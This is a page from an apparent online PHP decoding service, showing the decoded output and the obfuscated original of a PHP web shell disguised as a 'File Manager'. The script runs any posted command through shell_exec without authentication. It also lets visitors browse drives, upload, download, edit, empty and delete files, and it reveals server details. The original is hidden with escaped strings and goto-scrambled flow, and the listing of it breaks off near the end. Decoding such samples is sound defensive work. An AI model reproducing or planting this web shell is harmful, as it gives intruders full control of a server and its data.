Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php goto nwyrv; tCpbn: echo $_SERVER["\x50\110\x50\137\123\105\x4c\106"]; goto vkTFI; ..

Decoded Output download

<?php 
 goto nwyrv; tCpbn: echo $_SERVER["PHP_SELF"]; goto vkTFI; xGd4n: if ($_SERVER["REQUEST_METHOD"] === "POST" && isset($_POST["edit"])) { $fileToEdit = $_POST["edit"]; if (is_file($fileToEdit)) { $fileContent = readPhpFileContent($fileToEdit); echo "<h2>Editing File: {$fileToEdit}</h2>"; echo "<form method='post'>\xa                      <input type='hidden' name='editFile' value='{$fileToEdit}'>\xa                      <textarea name='editedContent'>{$fileContent}</textarea><br>
                      <button type='submit'>Save Changes</button>\xa                  </form>"; } else { echo "<p>Invalid file.</p>"; } } goto qobw9; O3cYE: if (isset($_POST["empty_file"])) { $fileToEmpty = $_POST["empty_file"]; if (is_file($fileToEmpty)) { $fileHandle = fopen($fileToEmpty, "w"); fclose($fileHandle); echo "<p>File emptied successfully.</p>"; } else { echo "<p>Invalid file.</p>"; } } goto Xwwbn; qobw9: ?> 
<h2>Command-line Interface</h2><form id="commandForm"><label for="command">Enter Command:</label> <input name="command"id="command"required> <button type="submit">Execute</button></form><div id="output"></div><script>document.getElementById('commandForm').addEventListener('submit', function(e) { 
            e.preventDefault(); 
            var command = document.getElementById('command').value; 
            var currentDir = '<?php  goto XeV9d; vkTFI: ?> 
"><label for="dir">Select Directory:</label> <select id="dir"name="dir"><?php  goto Yn69p; NPAIZ: if (is_dir($currentDir)) { $files = array_diff(scandir($currentDir), array(".", "..")); echo "<ul>"; foreach ($files as $file) { $filePath = $currentDir . $file; $modifiedTime = getLastModified($filePath); $fileSize = formatFileSize(filesize($filePath)); echo "<li>"; if (is_dir($filePath)) { echo "<strong>Directory:</strong> <a href="?dir=" . urlencode($filePath) . "">{$file}</a> (Last Modified: {$modifiedTime})"; } else { echo "<strong>File:</strong> {$file} (Size: {$fileSize}, Last Modified: {$modifiedTime})"; echo " - <form method='post' style='display:inline;'>\xa	\x9\x9\x9\x9\x9  <input type='hidden' name='download' value='{$filePath}'>
\x9			\x9\x9  <button type='submit'>Download</button>
\x9\x9	\x9	  </form>"; echo " - <form method='post' style='display:inline;' onsubmit='return confirm("Are you sure you want to delete this file?");'>
\x9\x9\x9\x9\x9	  <input type='hidden' name='delete' value='{$filePath}'>\xa			\x9		  <button type='submit'>Delete</button>\xa	\x9	\x9\x9  </form>"; echo " - <form method='post' style='display:inline;'>\xa\x9\x9				  <input type='hidden' name='edit' value='{$filePath}'>
	\x9	\x9	\x9  <button type='submit'>Edit</button>
	\x9	\x9	  </form>"; echo " - <form method='post' style='display:inline;'>
\x9		\x9		  <input type='hidden' name='empty_file' value='{$filePath}'>
\x9				\x9  <button type='submit' onclick='return confirm("Are you sure you want to empty this file?");'>Empty</button>\xa		\x9		  </form>"; } echo "</li>"; } echo "</ul>"; } else { echo "<p>Invalid directory.</p>"; } goto RGRIt; JVKbK: if ($_SERVER["REQUEST_METHOD"] === "POST" && isset($_POST["command"])) { $command = $_POST["command"]; $currentDir = isset($_POST["currentDir"]) ? cleanPath($_POST["currentDir"]) : "C:/"; chdir($currentDir); $output = shell_exec($command . " 2>&1"); echo $output ?? "Command execution failed or produced no output."; die; } goto SSeOI; YmL_o: function getServerInfo() { $serverInfo = "<strong>Server Information:</strong><br>"; $serverInfo .= "Server IP: " . $_SERVER["SERVER_ADDR"] . "<br>"; $serverInfo .= "Server Port: " . $_SERVER["SERVER_PORT"] . "<br>"; $serverInfo .= "Server Software: " . $_SERVER["SERVER_SOFTWARE"] . "<br>"; $serverInfo .= "PHP Version: " . phpversion() . "<br>"; return $serverInfo; } goto SSJy5; Ye2k1: ?> 
"enctype="multipart/form-data"method="post"><input name="currentDir"type="hidden"value="<?php  goto i3557; SSeOI: if ($_SERVER["REQUEST_METHOD"] === "POST" && isset($_POST["uploadFile"])) { $currentDir = realpath($_GET["dir"]); $targetDir = $currentDir . DIRECTORY_SEPARATOR; $targetFile = $targetDir . basename($_FILES["fileToUpload"]["name"]); echo "GET Dir: " . $_GET["dir"] . "<br>"; if (move_uploaded_file($_FILES["fileToUpload"]["tmp_name"], $targetFile)) { echo "The file " . htmlspecialchars(basename($_FILES["fileToUpload"]["name"])) . " has been uploaded."; } else { echo "Sorry, there was an error uploading your file."; } header("Location: " . $_SERVER["PHP_SELF"] . "?dir=" . urlencode($targetDir)); die; } goto JP__0; jFuLq: echo "<h2>Current Directory: {$currentDir}</h2>"; goto NPAIZ; enHaL: if ($_SERVER["REQUEST_METHOD"] === "POST" && isset($_POST["delete"])) { $fileToDelete = $_POST["delete"]; if (is_file($fileToDelete)) { if (unlink($fileToDelete)) { echo "<p>File Deleted.</p>"; header("Location: " . $_SERVER["PHP_SELF"] . "?dir=" . urlencode(dirname($fileToDelete))); die; } else { echo "<p>Error deleting file.</p>"; } } elseif (is_dir($fileToDelete)) { echo "<p>Cannot delete a directory using this feature.</p>"; } else { echo "<p>Invalid file or directory.</p>"; } } goto O3cYE; En3ry: $currentDir = isset($_GET["dir"]) ? cleanPath($_GET["dir"]) : "C:/"; goto CZOvL; SSJy5: function getAvailableDrives() { $drives = array(); if (strtoupper(substr(PHP_OS, 0, 3)) === "WIN") { foreach (range("A", "Z") as $letter) { if (is_dir($letter . ":/")) { $drives[] = $letter . ":/"; } } } return $drives; } goto Nv_7m; NGsgi: function getLastModified($filePath) { $timestamp = @filemtime($filePath); if ($timestamp !== false) { return date("F d Y H:i:s", $timestamp); } else { return "Unknown"; } } goto YmL_o; Nv_7m: function formatFileSize($bytes) { if ($bytes >= 1073741824) { return number_format($bytes / 1073741824, 2) . " GB"; } elseif ($bytes >= 1048576) { return number_format($bytes / 1048576, 2) . " MB"; } elseif ($bytes >= 1024) { return number_format($bytes / 1024, 2) . " KB"; } elseif ($bytes > 1) { return $bytes . " bytes"; } elseif ($bytes == 1) { return "1 byte"; } else { return "0 bytes"; } } goto JVKbK; E9lKm: function savePhpFileContent($filePath, $content) { $fileHandle = fopen($filePath, "w"); if ($fileHandle === false) { return false; } fwrite($fileHandle, $content); fclose($fileHandle); return true; } goto OJYMV; RGRIt: ?> 
<form action="<?php  goto FuL1l; i3557: echo addslashes($currentDir); goto cNij1; ABb7Q: displayServerInfo(); goto qRTAD; XeV9d: echo addslashes($currentDir); goto mHAYC; CZOvL: $currentDir = rtrim($currentDir, "/") . "/"; goto jFuLq; p0A90: function cleanPath($path) { return realpath($path); } goto NGsgi; Xwwbn: function displayServerInfo() { echo getServerInfo(); } goto mVOBo; qK4Mn: ?> 
<!doctypehtml><html lang="en"><head><meta charset="UTF-8"><meta content="width=device-width,initial-scale=1"name="viewport"><title>File Manager</title><style>body{font-family:Arial,sans-serif;max-width:1200px;margin:0 auto;padding:20px}h1,h2{color:#333}form{margin-bottom:20px}input[type=text],select{width:300px;padding:5px}button{padding:5px 10px;background-color:#4caf50;color:#fff;border:none;cursor:pointer}button:hover{background-color:#45a049}#output{width:100%;height:200px;border:1px solid #ccc;padding:10px;overflow-y:auto;background-color:#f8f8f8;font-family:monospace}ul{list-style-type:none;padding:0}li{margin-bottom:10px}textarea{width:100%;height:300px;padding:5px;font-family:monospace}</style></head><body><h1>File Manager</h1><?php  goto ABb7Q; cNij1: ?> 
"> <label for="fileToUpload">Select file to upload:</label> <input name="fileToUpload"id="fileToUpload"type="file"> <button type="submit"name="uploadFile">Upload File</button></form><?php  goto xGd4n; Yn69p: $availableDrives = getAvailableDrives(); goto m2RhD; mVOBo: function readPhpFileContent($filePath) { return file_get_contents($filePath); } goto E9lKm; nwyrv: ob_start(); goto p0A90; RjVjG: echo $_SERVER["PHP_SELF"]; goto C_JGA; qRTAD: ?> 
<form action="<?php  goto tCpbn; EVprR: ?> 
</select> <button type="submit">Go</button></form><?php  goto En3ry; JP__0: if (isset($_POST["download"])) { $filePath = $_POST["download"]; if (file_exists($filePath)) { while (ob_get_level()) { ob_end_clean(); } header("Content-Description: File Transfer"); header("Content-Type: application/octet-stream"); header("Content-Disposition: attachment; filename=" . basename($filePath)); header("Expires: 0"); header("Cache-Control: must-revalidate"); header("Pragma: public"); header("Content-Length: " . filesize($filePath)); readfile($filePath); die; } else { echo "<p>File not found.</p>"; } } goto enHaL; OJYMV: if ($_SERVER["REQUEST_METHOD"] === "POST" && isset($_POST["editFile"])) { $filePath = $_POST["editFile"]; $editedContent = $_POST["editedContent"]; $currentDir = dirname($filePath); if (savePhpFileContent($filePath, $editedContent)) { echo "<p>File saved successfully.</p>"; } else { echo "<p>Error saving file.</p>"; } header("Location: " . $_SERVER["PHP_SELF"] . "?dir=" . urlencode($currentDir)); die; } goto qK4Mn; mHAYC: ?> 
'; // Get the current directory from PHP 
             
            fetch('<?php  goto RjVjG; FuL1l: echo $_SERVER["PHP_SELF"] . "?dir=" . urlencode($currentDir); goto Ye2k1; m2RhD: foreach ($availableDrives as $drive) { $selected = isset($_GET["dir"]) && $_GET["dir"] === $drive ? "selected" : ''; echo "<option value="{$drive}" {$selected}>{$drive}</option>"; } goto EVprR; C_JGA: ?> 
', { 
                method: 'POST', 
                headers: { 
                    'Content-Type': 'application/x-www-form-urlencoded', 
                }, 
                body: 'command=' + encodeURIComponent(command) + '&currentDir=' + encodeURIComponent(currentDir) 
            }) 
            .then(response => response.text()) 
            .then(data => { 
                var output = document.getElementById('output'); 
                output.innerHTML += '> ' + command + '<br>' + data.replace(/\n/g, '<br>') + '<br><br>'; 
                output.scrollTop = output.scrollHeight; 
            }) 
            .catch((error) => { 
                console.error('Error:', error); 
            }); 
             
            document.getElementById('command').value = ''; 
        });</script></body></html>

Did this file decode correctly?

Original Code

<?php
 goto nwyrv; tCpbn: echo $_SERVER["\x50\110\x50\137\123\105\x4c\106"]; goto vkTFI; xGd4n: if ($_SERVER["\x52\x45\x51\125\105\x53\124\137\x4d\x45\124\x48\117\104"] === "\x50\x4f\123\124" && isset($_POST["\145\x64\x69\x74"])) { $fileToEdit = $_POST["\145\144\151\164"]; if (is_file($fileToEdit)) { $fileContent = readPhpFileContent($fileToEdit); echo "\74\150\62\76\x45\144\151\164\151\x6e\x67\40\x46\x69\x6c\145\72\40{$fileToEdit}\74\x2f\x68\x32\76"; echo "\74\x66\x6f\x72\x6d\40\x6d\x65\164\x68\157\x64\75\47\x70\x6f\163\164\x27\x3e\xa\40\40\40\40\40\40\x20\40\x20\40\x20\x20\40\40\40\40\40\40\40\x20\x20\40\x3c\x69\x6e\x70\165\164\x20\x74\x79\x70\x65\75\x27\150\x69\144\x64\x65\156\x27\x20\x6e\141\155\145\75\x27\145\x64\x69\164\x46\x69\x6c\x65\x27\x20\166\141\x6c\x75\145\75\47{$fileToEdit}\x27\x3e\xa\x20\x20\40\40\40\40\x20\40\40\40\x20\x20\x20\40\x20\40\40\x20\x20\x20\x20\x20\x3c\x74\145\170\x74\141\162\145\141\x20\x6e\141\155\145\75\x27\x65\x64\x69\164\x65\x64\x43\x6f\156\x74\145\x6e\164\x27\x3e{$fileContent}\74\x2f\x74\x65\170\x74\x61\162\x65\141\x3e\x3c\x62\162\76\12\x20\40\40\x20\x20\40\x20\40\x20\x20\x20\x20\40\x20\x20\x20\x20\40\40\40\x20\x20\74\142\165\164\164\157\156\x20\164\x79\160\x65\x3d\x27\x73\165\x62\155\x69\164\47\x3e\123\141\166\145\40\x43\x68\141\156\147\x65\163\74\x2f\x62\x75\164\164\157\x6e\x3e\xa\x20\x20\x20\40\40\x20\x20\x20\40\x20\x20\x20\40\40\40\40\x20\40\74\x2f\x66\x6f\162\155\76"; } else { echo "\74\x70\76\111\156\x76\x61\154\151\144\x20\146\x69\154\145\x2e\x3c\x2f\x70\x3e"; } } goto qobw9; O3cYE: if (isset($_POST["\x65\155\160\164\x79\137\x66\151\154\145"])) { $fileToEmpty = $_POST["\x65\x6d\160\x74\x79\137\x66\151\x6c\x65"]; if (is_file($fileToEmpty)) { $fileHandle = fopen($fileToEmpty, "\167"); fclose($fileHandle); echo "\74\160\76\106\151\154\145\40\x65\x6d\160\x74\151\x65\x64\40\163\165\x63\x63\145\163\163\146\165\x6c\154\171\56\74\57\160\x3e"; } else { echo "\74\160\76\111\x6e\166\x61\154\151\x64\40\x66\x69\x6c\145\x2e\74\x2f\x70\x3e"; } } goto Xwwbn; qobw9: ?>
<h2>Command-line Interface</h2><form id="commandForm"><label for="command">Enter Command:</label> <input name="command"id="command"required> <button type="submit">Execute</button></form><div id="output"></div><script>document.getElementById('commandForm').addEventListener('submit', function(e) {
            e.preventDefault();
            var command = document.getElementById('command').value;
            var currentDir = '<?php  goto XeV9d; vkTFI: ?>
"><label for="dir">Select Directory:</label> <select id="dir"name="dir"><?php  goto Yn69p; NPAIZ: if (is_dir($currentDir)) { $files = array_diff(scandir($currentDir), array("\x2e", "\x2e\x2e")); echo "\x3c\x75\154\76"; foreach ($files as $file) { $filePath = $currentDir . $file; $modifiedTime = getLastModified($filePath); $fileSize = formatFileSize(filesize($filePath)); echo "\x3c\x6c\x69\x3e"; if (is_dir($filePath)) { echo "\x3c\x73\164\162\157\x6e\x67\x3e\x44\151\162\x65\143\164\157\x72\x79\x3a\x3c\x2f\163\x74\x72\157\x6e\147\x3e\40\74\x61\x20\150\162\x65\146\x3d\x22\x3f\144\151\x72\x3d" . urlencode($filePath) . "\x22\76{$file}\x3c\57\141\76\x20\50\114\x61\x73\164\x20\115\x6f\x64\x69\x66\x69\x65\x64\72\40{$modifiedTime}\51"; } else { echo "\74\163\x74\x72\157\156\x67\x3e\106\x69\x6c\145\x3a\74\x2f\x73\x74\162\157\156\147\76\40{$file}\x20\50\x53\x69\x7a\145\x3a\40{$fileSize}\x2c\40\x4c\141\x73\164\x20\x4d\157\144\151\146\151\x65\144\72\40{$modifiedTime}\51"; echo "\x20\55\40\74\146\157\162\x6d\x20\x6d\x65\164\150\157\144\75\47\160\x6f\x73\x74\47\x20\163\164\171\x6c\x65\75\47\x64\x69\x73\x70\154\141\x79\72\151\x6e\154\x69\156\145\x3b\x27\76\xa\11\x9\x9\x9\x9\x9\x20\x20\x3c\151\x6e\x70\x75\164\x20\x74\171\160\145\75\47\x68\151\144\144\145\156\x27\x20\x6e\x61\x6d\145\75\x27\x64\x6f\x77\x6e\154\x6f\x61\x64\x27\40\166\x61\154\x75\x65\75\x27{$filePath}\x27\76\12\x9\11\11\11\x9\x9\40\x20\x3c\142\x75\x74\x74\157\156\x20\164\171\x70\145\x3d\47\x73\165\142\155\151\x74\x27\x3e\x44\x6f\x77\156\154\x6f\141\144\74\x2f\x62\x75\x74\164\x6f\156\76\12\x9\x9\11\x9\11\40\40\74\57\x66\157\162\155\76"; echo "\x20\x2d\x20\74\x66\157\162\155\40\155\145\x74\x68\157\144\x3d\x27\x70\x6f\163\x74\x27\x20\x73\164\x79\x6c\x65\75\47\x64\151\x73\x70\154\x61\171\72\x69\156\x6c\x69\x6e\145\x3b\47\x20\x6f\x6e\163\165\x62\155\151\x74\75\x27\x72\145\164\x75\162\x6e\x20\x63\x6f\156\x66\151\162\155\50\42\101\162\145\x20\171\x6f\165\40\x73\x75\x72\145\40\171\x6f\x75\x20\167\141\156\164\40\164\x6f\40\144\x65\154\x65\x74\x65\40\x74\150\x69\163\40\x66\151\154\x65\77\x22\x29\x3b\47\76\12\x9\x9\x9\x9\x9\11\40\x20\74\x69\156\x70\x75\x74\x20\x74\x79\160\x65\x3d\47\150\151\144\144\x65\x6e\x27\x20\x6e\141\155\x65\75\x27\144\145\154\145\x74\x65\47\x20\166\141\x6c\x75\145\x3d\x27{$filePath}\47\76\xa\11\11\11\x9\11\11\40\40\74\142\x75\x74\164\157\156\40\x74\x79\160\x65\75\47\163\165\x62\155\151\x74\x27\x3e\x44\145\x6c\145\164\145\74\57\x62\x75\x74\164\x6f\156\76\xa\11\x9\11\x9\x9\x20\x20\x3c\x2f\x66\x6f\162\x6d\x3e"; echo "\x20\x2d\x20\x3c\x66\157\162\x6d\x20\155\x65\164\x68\157\x64\x3d\47\x70\x6f\163\164\x27\x20\163\x74\171\x6c\x65\75\x27\144\x69\x73\x70\154\x61\x79\72\151\x6e\x6c\151\x6e\x65\x3b\47\76\xa\x9\x9\11\11\11\11\x20\x20\x3c\151\x6e\160\x75\x74\40\164\x79\160\145\75\x27\x68\x69\144\x64\x65\156\x27\x20\x6e\x61\155\x65\75\47\145\x64\x69\164\x27\x20\x76\141\x6c\165\145\x3d\x27{$filePath}\47\76\12\11\x9\11\x9\11\x9\40\40\74\142\165\164\164\157\156\40\x74\x79\160\145\75\x27\x73\165\x62\155\x69\164\x27\x3e\105\x64\151\164\74\57\x62\x75\x74\x74\157\x6e\76\12\11\x9\11\x9\11\40\40\x3c\57\146\157\162\155\76"; echo "\x20\x2d\x20\x3c\x66\157\162\x6d\x20\x6d\145\x74\x68\x6f\x64\x3d\x27\160\157\x73\x74\x27\x20\x73\x74\171\154\x65\x3d\x27\144\x69\163\x70\154\141\171\72\151\x6e\154\x69\x6e\x65\73\47\x3e\12\x9\11\11\x9\11\11\x20\40\74\x69\156\160\x75\x74\40\x74\x79\160\x65\75\47\x68\151\144\144\x65\x6e\x27\x20\156\141\x6d\145\x3d\x27\145\155\x70\164\171\137\146\151\154\145\x27\40\x76\x61\154\165\145\x3d\47{$filePath}\x27\76\12\x9\11\11\11\11\x9\40\x20\x3c\142\165\x74\x74\x6f\156\x20\x74\x79\160\145\75\47\x73\x75\142\155\x69\x74\47\40\157\156\x63\154\151\143\153\75\x27\x72\145\164\165\x72\156\40\x63\x6f\156\146\x69\162\x6d\50\42\101\162\x65\x20\x79\157\x75\40\x73\165\162\145\x20\x79\x6f\x75\x20\x77\141\x6e\x74\40\164\157\40\x65\x6d\160\x74\171\40\164\150\x69\163\40\x66\151\154\x65\x3f\42\x29\x3b\x27\76\105\155\160\x74\171\x3c\57\x62\x75\164\164\157\x6e\x3e\xa\11\11\x9\11\11\40\40\74\x2f\x66\157\x72\x6d\x3e"; } echo "\x3c\x2f\x6c\151\x3e"; } echo "\x3c\57\165\154\76"; } else { echo "\x3c\160\x3e\111\x6e\166\141\154\x69\144\x20\144\x69\162\x65\x63\164\157\x72\171\56\x3c\57\160\76"; } goto RGRIt; JVKbK: if ($_SERVER["\x52\x45\x51\125\105\123\124\x5f\115\x45\x54\110\117\x44"] === "\x50\117\123\x54" && isset($_POST["\143\x6f\x6d\x6d\x61\156\144"])) { $command = $_POST["\143\x6f\155\155\141\x6e\144"]; $currentDir = isset($_POST["\x63\x75\x72\162\x65\156\164\x44\x69\x72"]) ? cleanPath($_POST["\x63\x75\162\162\x65\156\164\x44\x69\x72"]) : "\x43\x3a\57"; chdir($currentDir); $output = shell_exec($command . "\x20\62\x3e\46\61"); echo $output ?? "\x43\157\155\155\x61\x6e\144\x20\x65\x78\145\143\165\164\x69\x6f\156\x20\x66\141\x69\154\x65\144\40\x6f\x72\x20\x70\162\157\144\x75\143\145\x64\x20\156\x6f\x20\x6f\x75\x74\x70\165\164\x2e"; die; } goto SSeOI; YmL_o: function getServerInfo() { $serverInfo = "\x3c\x73\164\162\x6f\x6e\x67\76\123\x65\x72\166\145\x72\40\x49\156\x66\x6f\x72\x6d\x61\164\151\x6f\156\x3a\x3c\57\163\164\x72\157\x6e\x67\76\x3c\x62\162\x3e"; $serverInfo .= "\x53\x65\x72\x76\145\162\x20\x49\x50\x3a\x20" . $_SERVER["\x53\105\x52\126\105\x52\137\x41\x44\104\122"] . "\x3c\x62\x72\76"; $serverInfo .= "\123\145\x72\166\x65\x72\40\120\x6f\x72\x74\72\40" . $_SERVER["\123\x45\122\x56\105\122\137\x50\117\x52\x54"] . "\74\x62\162\x3e"; $serverInfo .= "\123\x65\x72\166\x65\x72\x20\x53\157\x66\x74\x77\x61\x72\x65\x3a\x20" . $_SERVER["\123\x45\x52\x56\x45\122\x5f\123\117\x46\x54\x57\101\x52\x45"] . "\x3c\x62\x72\x3e"; $serverInfo .= "\120\x48\x50\x20\x56\x65\x72\x73\x69\157\x6e\x3a\x20" . phpversion() . "\74\x62\162\x3e"; return $serverInfo; } goto SSJy5; Ye2k1: ?>
"enctype="multipart/form-data"method="post"><input name="currentDir"type="hidden"value="<?php  goto i3557; SSeOI: if ($_SERVER["\x52\105\x51\x55\105\x53\x54\x5f\x4d\105\124\x48\x4f\x44"] === "\x50\x4f\123\x54" && isset($_POST["\165\x70\x6c\157\141\144\x46\151\154\x65"])) { $currentDir = realpath($_GET["\x64\151\x72"]); $targetDir = $currentDir . DIRECTORY_SEPARATOR; $targetFile = $targetDir . basename($_FILES["\x66\x69\154\145\124\x6f\x55\x70\x6c\157\141\144"]["\156\x61\x6d\x65"]); echo "\x47\105\124\x20\x44\x69\162\72\40" . $_GET["\144\x69\x72"] . "\x3c\x62\162\x3e"; if (move_uploaded_file($_FILES["\x66\151\154\145\x54\157\125\x70\154\157\141\144"]["\x74\x6d\x70\x5f\x6e\x61\x6d\145"], $targetFile)) { echo "\x54\x68\145\40\146\x69\154\x65\x20" . htmlspecialchars(basename($_FILES["\146\x69\x6c\x65\x54\x6f\125\160\x6c\x6f\141\x64"]["\x6e\x61\155\145"])) . "\40\x68\x61\163\x20\x62\x65\145\156\40\x75\160\154\x6f\x61\x64\x65\x64\56"; } else { echo "\123\157\162\162\x79\54\40\164\150\x65\162\145\x20\167\141\x73\x20\141\x6e\x20\145\162\x72\157\162\x20\165\x70\154\157\x61\x64\151\x6e\147\x20\171\157\x75\x72\40\146\x69\154\145\x2e"; } header("\114\157\x63\x61\x74\x69\x6f\156\x3a\x20" . $_SERVER["\x50\x48\120\137\x53\105\114\106"] . "\x3f\x64\151\162\75" . urlencode($targetDir)); die; } goto JP__0; jFuLq: echo "\x3c\150\62\76\103\x75\162\x72\145\156\x74\x20\x44\x69\162\145\143\164\x6f\x72\171\x3a\x20{$currentDir}\74\57\x68\62\76"; goto NPAIZ; enHaL: if ($_SERVER["\122\x45\x51\x55\105\123\124\137\x4d\x45\x54\110\x4f\x44"] === "\120\x4f\123\x54" && isset($_POST["\x64\145\x6c\145\164\145"])) { $fileToDelete = $_POST["\x64\145\x6c\x65\164\x65"]; if (is_file($fileToDelete)) { if (unlink($fileToDelete)) { echo "\74\160\x3e\x46\151\x6c\145\40\x44\145\x6c\x65\164\145\144\x2e\x3c\57\160\76"; header("\114\x6f\x63\x61\164\x69\157\156\x3a\40" . $_SERVER["\x50\x48\120\137\123\x45\114\106"] . "\77\x64\x69\162\75" . urlencode(dirname($fileToDelete))); die; } else { echo "\74\160\x3e\105\162\x72\x6f\162\x20\x64\x65\154\x65\164\151\x6e\147\40\x66\x69\154\x65\x2e\x3c\x2f\160\x3e"; } } elseif (is_dir($fileToDelete)) { echo "\x3c\160\x3e\103\141\156\x6e\157\164\40\144\145\154\x65\x74\x65\40\141\40\144\151\162\145\143\x74\157\162\171\40\165\163\x69\x6e\x67\x20\x74\x68\151\163\40\146\x65\x61\164\165\x72\145\56\x3c\57\160\x3e"; } else { echo "\x3c\160\76\111\x6e\166\141\x6c\x69\144\x20\x66\x69\154\x65\x20\x6f\162\40\x64\151\162\145\x63\x74\157\x72\x79\56\x3c\57\160\x3e"; } } goto O3cYE; En3ry: $currentDir = isset($_GET["\144\x69\162"]) ? cleanPath($_GET["\x64\x69\x72"]) : "\103\72\57"; goto CZOvL; SSJy5: function getAvailableDrives() { $drives = array(); if (strtoupper(substr(PHP_OS, 0, 3)) === "\x57\x49\x4e") { foreach (range("\101", "\x5a") as $letter) { if (is_dir($letter . "\x3a\57")) { $drives[] = $letter . "\x3a\57"; } } } return $drives; } goto Nv_7m; NGsgi: function getLastModified($filePath) { $timestamp = @filemtime($filePath); if ($timestamp !== false) { return date("\106\40\144\x20\131\40\x48\x3a\151\72\163", $timestamp); } else { return "\x55\x6e\x6b\x6e\157\x77\156"; } } goto YmL_o; Nv_7m: function formatFileSize($bytes) { if ($bytes >= 1073741824) { return number_format($bytes / 1073741824, 2) . "\x20\x47\x42"; } elseif ($bytes >= 1048576) { return number_format($bytes / 1048576, 2) . "\x20\x4d\102"; } elseif ($bytes >= 1024) { return number_format($bytes / 1024, 2) . "\40\x4b\102"; } elseif ($bytes > 1) { return $bytes . "\x20\x62\x79\x74\x65\163"; } elseif ($bytes == 1) { return "\x31\x20\142\171\164\x65"; } else { return "\x30\x20\x62\171\164\x65\x73"; } } goto JVKbK; E9lKm: function savePhpFileContent($filePath, $content) { $fileHandle = fopen($filePath, "\167"); if ($fileHandle === false) { return false; } fwrite($fileHandle, $content); fclose($fileHandle); return true; } goto OJYMV; RGRIt: ?>
<form action="<?php  goto FuL1l; i3557: echo addslashes($currentDir); goto cNij1; ABb7Q: displayServerInfo(); goto qRTAD; XeV9d: echo addslashes($currentDir); goto mHAYC; CZOvL: $currentDir = rtrim($currentDir, "\x2f") . "\57"; goto jFuLq; p0A90: function cleanPath($path) { return realpath($path); } goto NGsgi; Xwwbn: function displayServerInfo() { echo getServerInfo(); } goto mVOBo; qK4Mn: ?>
<!doctypehtml><html lang="en"><head><meta charset="UTF-8"><meta content="width=device-width,initial-scale=1"name="viewport"><title>File Manager</title><style>body{font-family:Arial,sans-serif;max-width:1200px;margin:0 auto;padding:20px}h1,h2{color:#333}form{margin-bottom:20px}input[type=text],select{width:300px;padding:5px}button{padding:5px 10px;background-color:#4caf50;color:#fff;border:none;cursor:pointer}button:hover{background-color:#45a049}#output{width:100%;height:200px;border:1px solid #ccc;padding:10px;overflow-y:auto;background-color:#f8f8f8;font-family:monospace}ul{list-style-type:none;padding:0}li{margin-bottom:10px}textarea{width:100%;height:300px;padding:5px;font-family:monospace}</style></head><body><h1>File Manager</h1><?php  goto ABb7Q; cNij1: ?>
"> <label for="fileToUpload">Select file to upload:</label> <input name="fileToUpload"id="fileToUpload"type="file"> <button type="submit"name="uploadFile">Upload File</button></form><?php  goto xGd4n; Yn69p: $availableDrives = getAvailableDrives(); goto m2RhD; mVOBo: function readPhpFileContent($filePath) { return file_get_contents($filePath); } goto E9lKm; nwyrv: ob_start(); goto p0A90; RjVjG: echo $_SERVER["\120\x48\x50\x5f\123\105\x4c\x46"]; goto C_JGA; qRTAD: ?>
<form action="<?php  goto tCpbn; EVprR: ?>
</select> <button type="submit">Go</button></form><?php  goto En3ry; JP__0: if (isset($_POST["\144\157\167\156\x6c\x6f\141\x64"])) { $filePath = $_POST["\144\157\x77\156\154\x6f\141\144"]; if (file_exists($filePath)) { while (ob_get_level()) { ob_end_clean(); } header("\103\x6f\156\164\x65\x6e\164\x2d\x44\x65\163\143\x72\x69\160\x74\x69\x6f\156\x3a\x20\x46\151\x6c\x65\40\x54\162\x61\156\x73\x66\145\x72"); header("\103\x6f\x6e\x74\145\x6e\x74\55\124\x79\160\x65\72\x20\141\x70\160\x6c\151\143\x61\164\151\157\156\x2f\x6f\143\164\x65\x74\55\163\164\162\x65\x61\x6d"); header("\103\x6f\x6e\x74\145\x6e\164\55\104\x69\x73\160\157\x73\x69\164\x69\x6f\156\x3a\40\x61\x74\x74\141\143\150\155\x65\x6e\164\73\40\x66\151\x6c\x65\x6e\x61\155\145\x3d" . basename($filePath)); header("\105\170\160\151\162\145\x73\72\x20\x30"); header("\x43\141\143\x68\x65\55\x43\157\x6e\164\162\157\154\72\40\155\165\163\164\55\x72\x65\x76\141\x6c\151\x64\141\x74\145"); header("\120\162\x61\x67\155\141\72\40\160\x75\x62\x6c\151\x63"); header("\103\x6f\156\x74\145\156\x74\55\x4c\145\156\147\x74\150\72\x20" . filesize($filePath)); readfile($filePath); die; } else { echo "\74\160\x3e\106\151\154\x65\40\x6e\157\x74\40\x66\x6f\165\156\x64\x2e\74\x2f\x70\76"; } } goto enHaL; OJYMV: if ($_SERVER["\122\105\121\125\x45\123\124\x5f\x4d\105\124\x48\x4f\104"] === "\120\x4f\x53\x54" && isset($_POST["\145\144\x69\164\106\x69\154\x65"])) { $filePath = $_POST["\x65\144\151\x74\106\x69\154\145"]; $editedContent = $_POST["\145\x64\x69\x74\145\x64\103\157\156\164\x65\156\164"]; $currentDir = dirname($filePath); if (savePhpFileContent($filePath, $editedContent)) { echo "\74\x70\x3e\106\151\x6c\145\x20\x73\141\166\145\144\40\163\165\x63\143\145\x73\x73\146\165\154\x6c\171\x2e\74\57\160\x3e"; } else { echo "\x3c\160\x3e\105\x72\162\x6f\x72\40\x73\141\166\151\x6e\x67\40\x66\151\154\x65\x2e\74\57\x70\76"; } header("\x4c\157\143\141\x74\x69\157\x6e\x3a\40" . $_SERVER["\x50\110\x50\137\123\105\114\x46"] . "\77\x64\151\162\75" . urlencode($currentDir)); die; } goto qK4Mn; mHAYC: ?>
'; // Get the current directory from PHP
            
            fetch('<?php  goto RjVjG; FuL1l: echo $_SERVER["\x50\x48\120\x5f\123\105\x4c\106"] . "\x3f\144\151\162\x3d" . urlencode($currentDir); goto Ye2k1; m2RhD: foreach ($availableDrives as $drive) { $selected = isset($_GET["\144\x69\162"]) && $_GET["\144\x69\x72"] === $drive ? "\163\x65\154\x65\143\x74\145\144" : ''; echo "\x3c\157\x70\x74\x69\157\x6e\40\x76\x61\154\x75\145\x3d\x22{$drive}\42\40{$selected}\76{$drive}\74\57\x6f\x70\164\x69\x6f\156\76"; } goto EVprR; C_JGA: ?>
', {
                method: 'POST',
                headers: {
                    'Content-Type': 'application/x-www-form-urlencoded',
                },
                body: 'command=' + encodeURIComponent(command) + '&currentDir=' + encodeURIComponent(currentDir)
            })
            .then(response => response.text())
            .then(data => {
                var output = document.getElementById('output');
                output.innerHTML += '> ' + command + '<br>' + data.replace(/\n/g, '<br>') + '<br><br>';
                output.scrollTop = output.scrollHeight;
            })
            .catch((error) => {
